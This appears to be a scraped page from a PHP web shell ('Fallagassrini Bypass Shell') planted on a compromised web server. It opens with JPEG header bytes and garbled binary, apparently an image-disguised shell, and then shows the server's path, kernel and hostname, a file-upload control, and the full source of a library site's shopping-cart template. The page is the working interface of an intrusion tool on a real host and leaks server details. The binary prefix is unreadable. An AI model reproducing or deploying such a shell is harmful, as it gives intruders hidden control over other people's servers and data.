JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/templates/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/templates/myCart.tpl

        
        <!-- Title Section -->
        <div class="title-section module">
            <div class="row">
        
                <div class="small-12 columns">
                    <h1>My Cart</h1>
                </div><!-- Top Row /-->
        
                <div class="small-12 columns">
                    <ul class="breadcrumbs">
                        <li><a href="#">Home</a></li>
                        <li><a href="#">Features</a></li>
                        <!--<li class="disabled">Gene Splicing</li>-->
                        <li><span class="show-for-sr">Current: </span> My Cart</li>
                    </ul><!-- Breadcrumbs /-->
                </div><!-- Bottom Row /-->
                
            </div><!-- Row /-->
        </div>
        <!-- Title Section Ends /-->
        
		
        <!-- Content section -->
        <div class="content-section module blog-page">
        	
            <div class="row">
                <div class="medium-10 small-12 columns posts-wrap">

                    <div class="blog-post">
                        <form name="CartList" id="CartList" method="post" >
						<input type="hidden" name="hdAction" id="hdAction">
						<input type="hidden" name="b_id" id="b_id" value="{$smarty.post.b_id}">
						
						
							  <!--<h5 class="theme-color" align="justify">Member Code: {$smarty.session.Web_User_ID}</h5>-->
							  <!--<h5>Your Member ID : <b class="theme-color">{$cartDet.0.member_id}</b></h5>-->
							   <!--<label class="medium-2 small-12 columns" style="text-align:left; ">Member Code: {$smarty.session.Web_User_ID}</label>-->
							 
							  &nbsp;
					<table class="table table-bordered table-hover  dataTables-example" style="font-size:14px;" border="1" bordercolor="#FFFFFF" cellspacing="3" cellpadding="2">
                    <thead style="background-color:#174873; color:#FFFFFF;">
                    <tr>
						
						<!--<th>Book Image</th>-->
						 <th>Book Name</th>
						 <th>Category Name</th>
                        <th>Author Name</th>
                        <th>Reading Charges</th>	
						<th align="center">Reading Days</th>	
						<th>Book Image</th>	
						<th>Action</th>
                    </tr>
                    </thead>
					
					
                    <tbody>
                    
                   
					{if $cartDet neq ""}
						
                   
                    <input type="hidden" id="member_id" name="member_id" value="{$cartDet.0.member_id}">
                    <input type="hidden" id="member_code" name="member_code" value="{$cartDet.0.member_code}">
                    <input type="hidden" id="OldOrder_id" name="OldOrder_id" value="{$MaxRecord.0.LastOrderId}">
                    
                      <input type="hidden" id="b_id" name="b_id" value="{$smarty.post.b_id}">
                      {if $BookCartCount.0.CNT neq "0"}
					{foreach from=$cartDet item=lists}
					
                  <tr class="gradeX" id="{$m++}">
			
			<!--<td>{if $num8.image_path neq ""}
			    						<img src="https://www.easwarilibrary.in/images/BookImages/{$num8.image_path}" alt="{$num8.image_path}" width="109" height="84">{else}<img src="https://www.easwarilibrary.in/images/ell_new.jpg" alt="images/noimage.jpg" width="109" height="164">{/if}</td>-->		
			<td><a  href="#">{$lists.book_name}</a></td>		
			<td><a  href="#">{$lists.category}</a></td>			
		  	<td><a  href="#">{$lists.author}</a></td>
            <td><a  href="#" align="right">{$lists.reading_charges|string_format:"%.2f"}</a></td>
		  	<td  align="center"><a  href="#"  >{$lists.default_reading_days}</a></td>
			<td><a  href="?book_id={$lists.book_id}">{if $lists.image neq ""}
									<img src="https://www.easwarilibrary.in/images/BookImages/{$lists.image}" alt="images/noimage.jpg" style="width:50px; height:65px;">
									{else}
									<img src="images/noimage.png" alt="images/noimage.jpg" style="width:50px; height:65px;">
									{/if}</a></td>				        
		  
              <td><a href="#" onclick=deleteCats({$lists.member_id},{$lists.book_id}) title="Remove"><i class="fa fa-trash"></i></a></td>		
                  </tr>
					{/foreach}	
                    {else}
                <tr>
                <td colspan="7" align="center">No Records Found</td>	
                </tr>
            {/if}

                    </tbody>
                  
                    </table>
					  </form>
					  {/if}
                    
					  <!-- post content ends /-->
                    </div><!-- post Ends here /-->
                   
                    <div class="medium-2 small-12 columns" style="margin-left:830px">
                    {if $BookCartCount.0.CNT neq "0"}
                    <input type="button"  id="formadd" class="button secondary" value="Check Out" onClick="select_book();">
                {/if}
                </div>
          
                    <!-- post Ends here /-->
                    
                    <!-- post Ends here /-->
                    
                   <div class="col-lg-6 col-xs-6 r-full-width" style="height:40%;">
								
							
							
						</div>
                    
                </div><!-- Posts wrap /-->
                
                
                
            </div><!-- Row Ends /-->
            
        
        <!-- Content Section Ends /-->
        
        
        <!-- Call to Action box -->
        
        <!-- Call to Action End /-->
        
        <!-- Footer -->
        
        <!-- Footer Ends here /-->
        
    </div>
    <!-- Main Container /-->
	
    <a href="#top" id="top" class="animated fadeInUp start-anim"><i class="fa fa-angle-up"></i></a>

   
	{literal}
	 <!-- Including Jquery so All js Can run -->
    <script type="text/javascript" src="js/jquery.js"></script>
    
    <!-- Including Foundation JS so Foundation function can work. -->
    
    <!-- Including Owl Carousel File -->
    <script type="text/javascript" src="js/owl.carousel.min.js"></script>
    
    <!-- Webful JS -->
	<script type="text/javascript">
    function validateFields() {
	var f_date=$('#f_date').val();
	var t_date=$('#t_date').val();
   
	$(".error").remove();
	if(f_date=="")
	{
	$('#f_date').after('<span class="error">This field is required</span>');
	
	$('#f_date').focus();
	
	return false;	
	}
	if(t_date =="")
	{
	$('#t_date').after('<span class="error">This field is required</span>');
	
	$('#t_date').focus();
	
	return false;	
	}	
	
}

    function deleteCats(CatIdent,bookid){ 
		  //alert(CatIdent);return false;
	if(confirm("Are you sure to Delete this Content?")){
	FormName		= document.CartList;
	FormName.action= "myCart.php?MemberId="+CatIdent+"&bookId="+bookid+"&delete=true";
	FormName.submit();
	}
}


 

                $("#formadd").click(function(){
                   
                //  alert("hiiiiiiiiii");				
                  FormName= document.CartList;
                  FormName.method= "POST";
                  FormName.submit();	
				  
                 
				 

			
    });
 
</script>


	<style>
.table tr:nth-child(even){background-color: #FFFFFF;}
.isa_success

{

color: #FFFFFF;

background-color: #174873;

}

.error

{

color:#D8000C;

/*background-color:#FFBABA;*/

}

.isa_error

{

color:#D8000C;

background-color:#FFBABA;

}

.isa_success i,.isa_error i

{

margin:10px 22px;

font-size:2em;

/*vertical-align:middle;*/

}

.required

{

color:#FF0000;
float:right;

}

</style>
	
{/literal}
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net